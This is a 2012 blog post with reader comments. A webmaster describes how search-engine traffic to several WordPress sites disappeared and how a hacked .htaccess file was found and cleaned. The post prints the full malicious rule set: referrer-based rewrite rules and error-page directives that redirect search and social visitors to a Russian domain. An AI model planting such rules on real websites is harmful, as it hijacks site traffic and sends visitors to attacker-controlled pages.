First Time My Websites Got Hacked

March 2, 2012
By

First time my websites got hacked a week back and got it resolved today. Thought I should share this.

Events on Timeline

Feb. 24th, 2012 – I noticed the traffic dipped from 50 visitors per day to 1 visitor per day in my Google adsense and analytics for one of my main site. Basically my Search Engine Traffic went to zero. I made sure my site was not deindexed and the ranking was there. So I thought may be a problem in Google stats.

Feb. 25th, 2012 – I noticed the same effect for some of my other top performing sites. In fact this happened from Feb. 24th itself.

Feb. 26-29th, 2012 – I was caught up in other works and didn’t follow this problem though I kept checking the stats. I found the same kind of traffic dip in my Awstats as well.

Mar. 1, 2012 – I was confused and I wanted to know why all my search engine traffic(from google, yahoo, bing etc) have vaporized.  I did the following.

1. I checked my main site to see if it is loading properly and displaying the adsense ads. Yes everything was fine there.

2. I checked if my site’s main page and other pages were still indexed in Google, Yahoo & Bing. Yes it was there.

3. I made sure the site was still ranking on the first page which it did.

4. I also made sure my adsense ads & analytics code was embedded in my site by looking at the page’s source code. You know how to do it, don’t you.  In firefox go to Tools->Web Developer->Page Source.

Mar. 2, 2012 – My adsense revenue & traffic was zero. I had enough of it and I made up my mind to fix it today no matter what. I went to Google and searched the keyword for which I rank third. I clicked my site on the SERP. Boom my site got redirected to “http://bamosa dot ru”. The same effect for all my other sites as well.

How I fixed the Problem

I went into digging it further. My site gets loaded properly when I type the url but only when I go from the search engines it gets redirected. I know I have to mess around with the .htaccess file.

To know how to edit your .htaccess file go to http://www.shoutmeloud.com/how-to-edit-your-wordpress-htaccess-file.html

I went through my cpanel to take a look at my .htaccess file. There I saw the code which redirects my site to another site when my site is referred from Google, Yahoo, Bing, Alexa etc etc.

I removed the following code from my .htaccess file and everything is back to normal.

“RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://bamosa.ru [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://bamosa.ru [R=301,L]

ErrorDocument 400 http://bamosa.ru
ErrorDocument 401 http://bamosa.ru
ErrorDocument 403 http://bamosa.ru
ErrorDocument 404 http://bamosa.ru
ErrorDocument 500 http://bamosa.ru “

 

My Observations

1.  Only my WordPress sites got affected.

2. I am not alone. Because the traffic for http://bamosa dot ru in the last week of Feb. 2012 and the ranking is close to 20K. My fellow domainers and webmasters need to check their sites for the same hack.

3. This is a clever hack. Since only my search engine traffic was hacked, I thought may be some glitch in the analytics code or something of that sort. That dragged my action time and in the process I lost a week’s traffic and revenue.

 

10 Responses to First Time My Websites Got Hacked

  1. RH
    March 2, 2012 at 10:14 pm

    Thanks for the post,very interesting and I had no idea that only search could be affected.

  2. sympathizer
    March 3, 2012 at 12:25 am

    Your site is also redirecting to a site knowled.ru if you click your site from domaining.com and even going to your site directly using android.

  3. March 3, 2012 at 8:00 am

    @sympathizer
    Thanks for the heads up. Fixed it and should work now.

  4. John
    March 4, 2012 at 2:52 am

    Was the attribute of the .htaccess read only. It if wasn’t, perhaps that’s how the hacker got to it.

  5. March 4, 2012 at 9:41 am

    @John
    Write permission is only for the registered user and only the admin is the registered user as of now.

  6. John
    March 6, 2012 at 1:45 am

    This is the second time I hear about WordPress being hacked. Perhaps they are not as secured as claimed to be. Time to consider other CMS option like Drupal? That thing is rock solid but harder to work/manage with.

  7. August 19, 2012 at 5:06 am

    very handy tips to get round the hackers, cheers

  8. August 25, 2012 at 8:01 pm

    thanks for the heads up

  9. October 16, 2012 at 11:22 pm

    Did you ever figure out how they changed your htaccess? Are you on shared hosting?

Leave a Reply

Your email address will not be published. Required fields are marked *

*